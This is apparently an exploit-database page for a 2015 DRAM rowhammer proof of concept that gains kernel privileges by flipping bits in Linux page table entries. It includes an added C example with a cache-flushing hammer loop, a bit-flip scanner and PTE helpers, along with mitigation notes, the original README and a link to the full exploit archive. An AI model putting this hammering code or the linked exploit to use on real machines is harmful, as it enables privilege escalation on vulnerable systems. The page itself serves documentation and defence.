Rowhammer Exploit
by: Mark Seaborn
CVSS: 8.2 (HIGH)
CWE: 119
Patch Exists: NO
Platforms Tested: Linux
Year: 2015

DRAM Rowhammer Exploit to Gain Kernel Privileges

This is a proof-of-concept exploit that is able to gain kernel privileges on machines that are susceptible to the DRAM 'rowhammer' problem. It runs as an unprivileged userland process on x86-64 Linux. It works by inducing bit flips in page table entries (PTEs). For development purposes, the exploit program has a test mode in which it induces a bit flip by writing to /dev/mem.
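The two mechanisms the summary names (hammering DRAM rows until a neighbouring row flips a bit, and relying on a flipped bit inside a page table entry retargeting a mapping) as an added C example. This is not code from the PoC or from Mark Seaborn; the hammer loop, the flip scanner and the PTE helpers are this page's own illustration. The aggressor offsets, the iteration count and the PTE value used in main() are constructed placeholders, not values tuned for any DIMM.

```c
/* Added example (not the exploit's own code). Three pieces of a rowhammer
 * attack on page tables:
 *   hammer_pair()    - alternate reads of two aggressor addresses, flushing
 *                      the cache line after each so every read hits DRAM.
 *   scan_for_flips() - find which bits of a filled buffer changed afterwards.
 *   pte_pfn()/pte_flip_bit() - show why one flipped bit in the physical-
 *                      frame-number field of an x86-64 PTE moves a virtual
 *                      page onto a different physical page.
 * Assumptions: x86-64, 4 KiB pages, 4-level paging PTE layout. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#if defined(__x86_64__)
#include <emmintrin.h>   /* _mm_clflush */
#endif

#define PAGE_SIZE 4096u

/* x86-64 PTE: bit 0 present, bit 1 writable, bit 2 user,
 * bits 12..51 physical frame number (PFN), bit 63 NX. */
#define PTE_PRESENT   (1ull << 0)
#define PTE_RW        (1ull << 1)
#define PTE_USER      (1ull << 2)
#define PTE_PFN_MASK  0x000FFFFFFFFFF000ull

static inline uint64_t pte_pfn(uint64_t pte) {
    return (pte & PTE_PFN_MASK) >> 12;
}

/* PTE after bit `bit` flips. For 12 <= bit <= 51 the PFN changes by
 * 2^(bit-12): the page now maps a different physical frame, which is
 * the effect the PoC steers towards a page-table page. */
static inline uint64_t pte_flip_bit(uint64_t pte, unsigned bit) {
    return pte ^ (1ull << bit);
}

/* Hammer loop. Without the CLFLUSH the CPU cache would serve the repeated
 * reads and DRAM would never see them. On a susceptible DIMM, rows physically
 * near the two aggressors may flip bits. */
static void hammer_pair(volatile uint8_t *a, volatile uint8_t *b,
                        unsigned long iterations) {
#if defined(__x86_64__)
    for (unsigned long i = 0; i < iterations; i++) {
        (void)*a;
        (void)*b;
        _mm_clflush((const void *)a);
        _mm_clflush((const void *)b);
    }
#else
    (void)a; (void)b; (void)iterations;  /* needs uncached x86 accesses */
#endif
}

/* Compare `len` bytes with the fill pattern. Records up to `max` flipped bit
 * positions (byte_index*8 + bit) into `out`; returns the total count. */
static size_t scan_for_flips(const uint8_t *buf, size_t len, uint8_t fill,
                             size_t *out, size_t max) {
    size_t count = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = buf[i] ^ fill;
        for (unsigned bit = 0; diff; bit++, diff >>= 1) {
            if (diff & 1) {
                if (count < max) out[count] = i * 8 + bit;
                count++;
            }
        }
    }
    return count;
}

int main(void) {
    /* Illustrative run: fill a buffer, hammer one (placeholder) pair, scan.
     * A real attack must pick aggressors in different rows of the same
     * bank, which requires knowledge of the DRAM address mapping. */
    size_t len = 8u << 20;
    uint8_t *buf = malloc(len);
    if (!buf) return 1;
    memset(buf, 0xFF, len);
    hammer_pair(buf, buf + 512 * PAGE_SIZE, 1000000UL);
    size_t flips[16];
    size_t n = scan_for_flips(buf, len, 0xFF, flips, 16);
    printf("%zu bit flip(s)\n", n);
    for (size_t i = 0; i < n && i < 16; i++)
        printf("  byte %zu bit %zu\n", flips[i] / 8, flips[i] % 8);

    /* Constructed PTE: flipping bit 12 moves the mapping by exactly one page. */
    uint64_t pte = 0x0000000012345000ull | PTE_PRESENT | PTE_RW | PTE_USER;
    printf("PFN 0x%llx -> 0x%llx after flipping bit 12\n",
           (unsigned long long)pte_pfn(pte),
           (unsigned long long)pte_pfn(pte_flip_bit(pte, 12)));
    free(buf);
    return 0;
}
```

Whether any flips show up depends entirely on the DIMM; the scanner reports zero on memory that is not susceptible, and the PTE helpers only show what a flip would do to the mapping, not how to make the flipped PTE land on a page-table page.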

Mitigation:

There is no software patch for rowhammer itself: the bit flips are a property of the DRAM, and the exploit's real mode needs no special privileges or kernel configuration. Exposure is reduced at the hardware level, for example by ECC memory or a higher DRAM refresh rate. Keeping CONFIG_STRICT_DEVMEM enabled (the default in most distribution kernels) blocks only the exploit's development test mode, which writes the bit flip directly through /dev/mem; it does nothing against the real attack.

Exploit-DB raw data:

Sources:
http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://code.google.com/p/google-security-research/issues/detail?id=283

Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36310.tar.gz

This is a proof-of-concept exploit that is able to gain kernel
privileges on machines that are susceptible to the DRAM "rowhammer"
problem.  It runs as an unprivileged userland process on x86-64 Linux.
It works by inducing bit flips in page table entries (PTEs).

For development purposes, the exploit program has a test mode in which
it induces a bit flip by writing to /dev/mem.  qemu_runner.py will run
the exploit program in test mode in a QEMU VM.  It assumes that
"bzImage" (in the current directory) is a Linux kernel image that was
built with /dev/mem enabled (specifically, with the
CONFIG_STRICT_DEVMEM option disabled).

Mark Seaborn
mseaborn@chromium.org
March 2015